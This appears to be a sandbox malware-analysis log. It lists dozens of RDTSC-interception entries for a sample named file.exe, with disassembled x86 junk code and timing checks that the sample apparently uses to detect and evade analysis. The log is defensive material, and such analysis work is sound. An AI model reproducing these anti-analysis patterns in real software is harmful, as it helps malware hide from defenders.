Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1162A97 second address: 1162AB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F43F0D0DC66h 0x0000000a jmp 00007F43F0D0DC72h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1162AB3 second address: 1162AD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F43F0D10396h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1162D86 second address: 1162DA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D0DC6Ah 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c jnp 00007F43F0D0DC72h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116307A second address: 1163086 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F43F0D10386h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1163086 second address: 11630B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D0DC6Fh 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 jmp 00007F43F0D0DC6Bh 0x00000019 js 00007F43F0D0DC6Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11630B7 second address: 11630C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 ja 00007F43F0D10386h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11661F3 second address: 1166225 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D0DC6Fh 0x00000007 push ebx 0x00000008 jmp 00007F43F0D0DC6Dh 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jbe 00007F43F0D0DC8Ah 0x00000018 jng 00007F43F0D0DC6Eh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F867D second address: 10F8696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43F0D10394h 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F8696 second address: 10F86B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D0DC73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F86B1 second address: 10F86E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F43F0D10398h 0x0000000a jmp 00007F43F0D10398h 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10FD4E2 second address: 10FD4E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116AC02 second address: 116AC2E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F43F0D10386h 0x00000008 jne 00007F43F0D10386h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F43F0D10393h 0x00000016 jc 00007F43F0D10386h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116AC2E second address: 116AC49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jg 00007F43F0D0DC66h 0x0000000c jng 00007F43F0D0DC66h 0x00000012 pop eax 0x00000013 popad 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116AC49 second address: 116AC67 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F43F0D1038Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F43F0D1038Eh 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116B0B3 second address: 116B0C5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F43F0D0DC66h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 111A668 second address: 111A66E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 111A66E second address: 111A67D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F43F0D0DC66h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 111A67D second address: 111A683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 111A683 second address: 111A6CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D0DC77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F43F0D0DC6Ch 0x0000000f jl 00007F43F0D0DC66h 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007F43F0D0DC79h 0x0000001c jo 00007F43F0D0DC6Eh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 111A6CD second address: 111A6D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116BEAC second address: 116BEE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007F43F0D0DC7Ah 0x0000000e popad 0x0000000f jl 00007F43F0D0DC7Eh 0x00000015 jmp 00007F43F0D0DC6Ah 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116BEE2 second address: 116BEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116FA83 second address: 116FA88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116FA88 second address: 116FA8D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 116FA8D second address: 116FA9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 js 00007F43F0D0DC6Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1175117 second address: 1175148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jp 00007F43F0D103A2h 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F43F0D10386h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1175148 second address: 117514C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117514C second address: 117518E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F43F0D10399h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F43F0D1038Ch 0x00000017 popad 0x00000018 jmp 00007F43F0D1038Ch 0x0000001d push edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117518E second address: 1175194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11752F1 second address: 11752FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11752FA second address: 1175316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F43F0D0DC66h 0x0000000a popad 0x0000000b push eax 0x0000000c je 00007F43F0D0DC66h 0x00000012 pop eax 0x00000013 pushad 0x00000014 jl 00007F43F0D0DC66h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1174E35 second address: 1174E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1175B40 second address: 1175B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F43F0D0DC66h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11760C5 second address: 11760D5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F43F0D10386h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11760D5 second address: 11760D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11760D9 second address: 11760F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F43F0D1038Eh 0x0000000c push edi 0x0000000d pop edi 0x0000000e jnp 00007F43F0D10386h 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11760F4 second address: 1176111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F43F0D0DC77h 0x00000010 jmp 00007F43F0D0DC6Bh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1176111 second address: 1176115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1176115 second address: 117611E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117611E second address: 1176124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117BC8B second address: 117BC95 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F43F0D0DC66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113E928 second address: 113E92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113F00F second address: 113F013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113FA46 second address: 111A668 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D10393h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jns 00007F43F0D10394h 0x00000010 nop 0x00000011 jnc 00007F43F0D10390h 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a sub dword ptr [ebp+122D30B1h], esi 0x00000020 popad 0x00000021 lea eax, dword ptr [ebp+12480562h] 0x00000027 cld 0x00000028 push eax 0x00000029 jmp 00007F43F0D10393h 0x0000002e mov dword ptr [esp], eax 0x00000031 mov dx, 50C3h 0x00000035 mov edx, dword ptr [ebp+122D3810h] 0x0000003b lea eax, dword ptr [ebp+1248051Eh] 0x00000041 sub dword ptr [ebp+122D2E97h], edx 0x00000047 push eax 0x00000048 jmp 00007F43F0D1038Bh 0x0000004d mov dword ptr [esp], eax 0x00000050 jp 00007F43F0D1038Ch 0x00000056 call dword ptr [ebp+122D1B1Eh] 0x0000005c pushad 0x0000005d pushad 0x0000005e pushad 0x0000005f popad 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117B05C second address: 117B067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F43F0D0DC66h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117B067 second address: 117B0A9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F43F0D1038Ch 0x00000008 jnp 00007F43F0D103ADh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117B0A9 second address: 117B0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43F0D0DC77h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117B0C4 second address: 117B0CA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117B3E4 second address: 117B3EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117B3EA second address: 117B3F6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F43F0D10386h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F1E87 second address: 10F1E8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117DDC5 second address: 117DDEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D10391h 0x00000007 js 00007F43F0D10386h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop edx 0x00000015 push edi 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117DDEA second address: 117DE0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F43F0D0DC66h 0x0000000c jmp 00007F43F0D0DC73h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117DE0E second address: 117DE14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 117DE14 second address: 117DE18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1180E2F second address: 1180E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1180E3C second address: 1180E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1180E42 second address: 1180E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1180E49 second address: 1180E56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jne 00007F43F0D0DC66h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1180E56 second address: 1180E5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1180E5C second address: 1180E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1180E65 second address: 1180E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1180FE3 second address: 1180FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43F0D0DC70h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1184A78 second address: 1184A7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1184A7E second address: 1184A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F6C98 second address: 10F6CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F43F0D10394h 0x0000000b popad 0x0000000c jmp 00007F43F0D1038Ah 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118AB71 second address: 118AB77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118AB77 second address: 118ABA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43F0D10394h 0x00000009 jmp 00007F43F0D10398h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118ABA8 second address: 118ABCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43F0D0DC78h 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b jc 00007F43F0D0DC6Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113F461 second address: 113F466 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113F466 second address: 113F48E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F43F0D0DC7Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113F48E second address: 113F4A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43F0D10392h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118B262 second address: 118B267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118B267 second address: 118B287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F43F0D10397h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118F52B second address: 118F546 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F43F0D0DC72h 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118F546 second address: 118F54C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118F54C second address: 118F55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jnp 00007F43F0D0DC66h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118F55D second address: 118F567 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F43F0D10386h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118F7CD second address: 118F7EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43F0D0DC78h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118F7EB second address: 118F7FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jl 00007F43F0D10386h 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118FBDE second address: 118FBFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43F0D0DC6Fh 0x00000009 pop esi 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F43F0D0DC66h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118FBFC second address: 118FC05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119768F second address: 1197696 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1197696 second address: 11976AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43F0D1038Eh 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1197EE5 second address: 1197EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119819E second address: 11981A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11981A2 second address: 11981A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11981A6 second address: 11981AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11981AC second address: 11981D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F43F0D0DC7Bh 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 popad 0x00000011 push ebx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119849C second address: 11984A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F43F0D10386h 0x0000000a popad 0x0000000b rdtsc
